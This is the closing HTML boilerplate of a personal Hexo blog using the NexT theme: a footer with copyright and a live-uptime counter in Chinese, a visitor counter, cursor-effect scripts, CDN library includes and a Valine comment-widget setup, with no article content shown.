  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 2020 – 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Str3am</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    <span title="Symbols count total">351k</span>
</div> 

<script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/moment.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/moment-precise-range-plugin@1.3.0/moment-precise-range.min.js"></script>
<script>
  function timer() {
    var ages = moment.preciseDiff(moment(),moment(20200108,"YYYYMMDD"));
    ages = ages.replace(/years?/, "年");
    ages = ages.replace(/months?/, "月");
    ages = ages.replace(/days?/, "天");
    ages = ages.replace(/hours?/, "小时");
    ages = ages.replace(/minutes?/, "分");
    ages = ages.replace(/seconds?/, "秒");
    ages = ages.replace(/\d+/g, '<span style="color:#1890ff">$&</span>');
    div.innerHTML = `我已在此等候你 ${ages}`;
  }
  var div = document.createElement("div");
  //插入到copyright之后
  var copyright = document.querySelector(".copyright");
  document.querySelector(".footer-inner").insertBefore(div, copyright.nextSibling);
  timer();
  setInterval("timer()",1000)
</script>




  <script async src="/js/cursor/love.min.js"></script>




  <script src="/js/cursor/activate-power-mode.min.js"></script>
  <script>
    POWERMODE.colorful = true;
    POWERMODE.shake = false;
    document.body.addEventListener('input', POWERMODE);
  </script>


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <!--
        <span class="post-meta-item-icon">
          <i class="fa fa-user"></i>
        </span>
        <span class="site-uv" title="我的第  undefined  位朋友，">
          <span id="busuanzi_value_site_uv"></span>
        </span>
      -->
      <span class="site-uv">
     我的第  <span style="margin:0 5px;" class="busuanzi-value" id="busuanzi_value_site_uv"></span>  位朋友，
    </span>
    <!--
      <span class="post-meta-divider">|</span>
    -->
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <!--
        <span class="post-meta-item-icon">
          <i class="fa fa-eye"></i>
        </span>
        <span class="site-pv" title="历经  undefined  次回眸才与你相遇">
          <span id="busuanzi_value_site_pv"></span>
        </span>
      -->
      <span class="site-pv">
     历经  <span style="margin:0 5px;" class="busuanzi-value" id="busuanzi_value_site_pv"></span>  次回眸才与你相遇
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el: '#valine-comments',
      verify: true,
      notify: true,
      appId: '3IVY8n0VhhMlAUHBsp34Pxx7-gzGzoHsz',
      appKey: 'DjdjX2sAzBG2G1G5c6amlBnv',
      placeholder: "Just go go",
      avatar: 'mm',
      meta: guest,
      pageSize: '10' || 10,
      visitor: false,
      lang: 'en' || 'zh-cn',
      path: location.pathname,
      recordIP: true,
      serverURLs: ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
